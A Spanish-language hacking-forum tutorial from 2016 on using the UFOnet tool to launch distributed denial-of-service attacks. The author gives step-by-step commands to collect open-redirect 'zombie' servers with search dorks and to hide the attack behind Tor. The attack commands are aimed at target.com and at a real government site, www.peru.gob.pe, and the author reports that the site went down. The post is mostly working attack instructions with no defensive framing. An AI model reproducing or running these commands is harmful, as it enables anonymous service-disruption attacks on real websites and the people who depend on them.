Enviando ataques masivos de DDoS con UFOnet

Iniciado por BrowserNet, Mayo 21, 2016, 09:42:06 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Mayo 21, 2016, 09:42:06 PM Ultima modificación: Mayo 30, 2016, 11:19:54 AM por EPSILON

Saludos hermanos de underc0de en esta oportunidad les traigo la herramienta llamada "UFOnet" la cual funciona como una "Botnet" de distribución de denegación de servicio, en nuestro sistema operativo GNU/Linux recolectando fallos de servidores web con la vulnerabilidad "Open Redirect" la cual enviara varias peticiones con grandes paquetes a la pagina objetivo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Descarga
Código: php

root@kali:~# git clone https://github.com/epsylon/ufonet
root@kali:~# cd ufonet
root@kali:~/ufonet# ls
root@kali:~/ufonet# cd ufonet
root@kali:~# ./ufonet



una ves descargado y comprobado que todo salio exitoso, vamos a configurar nuestro servidor añadiendo algunas configuraciones pero antes vamos a explicar algunos métodos que consta dicha herramienta.

Busqueda de Boots

Como sabrán esta herramienta consta de una búsqueda de indexiaciones por medio de "Dorks" donde vamos a encontrar parámetros GET  que son vulnerables para realizar este tipo de ataques como son:

    'check.cgi?url='
    'proxy.php?url='
    'validator?uri='
    'checklink?uri='

al realizar dichas consultas vamos a encontrarnos que el buscador por default es "duck", pero también podemos añadir otros parámetros para añadir otros buscadores como lo son bing, google, yahoo, yandex, etc, como son las siguientes:

Código: php

root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'bing'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'google'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yahoo'
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url=' --se 'yandex'


pero si deseamos hacer una búsqueda avanzada de las DORKS en general que contiene el repertorio de ufonet podemos hacer una búsqueda estándar para añadir mas paginas vulnerables las cuales son las siguientes:

Código: php
root@kali:~/ufonet/ufonet# ./ufonet --sd 'dorks.txt'



como pueden observar esta elaborando una búsqueda general de todas las Dorks encontradas en dicho documento de texto, donde rápidamente se guardara en un archivo llamado "Zombies.txt".

Pero si deseamos tener una conexión anónima en este caso con un proxy que sea directamente con ufonet esta implementado Tor, la cual podemos ejecutarlo de la siguiente manera.

Código: php
./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:9150"


Si no lo tienen instalado pueden ver el siguiente tutorial donde enseño como configurarlo para Kali.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bueno primero que nada, vamos a  ejecutar algunas conexiones default de pruebas de ataques para cargar el servidor y ver algunas peticiones que constan varias variaciones de estructuras, lo que haremos sera ejecutar un comando para obtener una búsqueda relacionada a una DORK como es la siguiente:


Código: php
root@kali:~/ufonet/ufonet# ./ufonet -s 'proxy.php?url='


luego de ello vamos a ejecutar el siguiente comando para cargar los módulos de los servicios web vulnerables

Código: php

root@kali:~/ufonet/ufonet# ./ufonet -i http://target.com



como vemos los archivos están siendo cargados de manera exitosa en nuestro servidor local, pero también podemos ejecutar  el siguiente comando para elaborar un TEST en el siguiente servicio.

Código: php
root@kali:~/ufonet/ufonet#  ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx" 



sin duda este ataque es muy efectivo ya que va realizar consultas con las listas mas grandes que puede ver en el servidor y es uno de los mas efectivos, pero también podemos ejecutar el siguiente que es aun mas prodigioso si es que se ha configurado bien el buscador de webs vulnerables, si deseamos lanzar un ataque mediante las conexiones de envíos por default podemos añadir lo siguiente:

Código: php
root@kali:~/ufonet/ufonet# ./ufonet -a http://www.peru.gob.pe -r 10 -v



como vemos primero nos carga los paquetes de envíos de las cabeceras, como acabamos de ver, pero al terminar lo siguiente, empezaremos a enviar las peticiones de acuerdo al tipo de threads que hemos realizado, como en mi caso fue 10, se ara una petición de 10 repeticiones:


como vemos en la siguiente imagen la herramienta consta de una website muy conocida llamada "downforeveryoneorjustme", donde nos dirá, si la web esta Down o UP como vemos nos dice que esta down o caída.



pero como siempre es bueno echar ojo en los servicios paso a verificarlo:



Lo interesante son los paquetes que envía y la respuesta que recibe.


entonces el Test del servidor se ha realizado correctamente. espero les haya gustado este POST.

Saludos!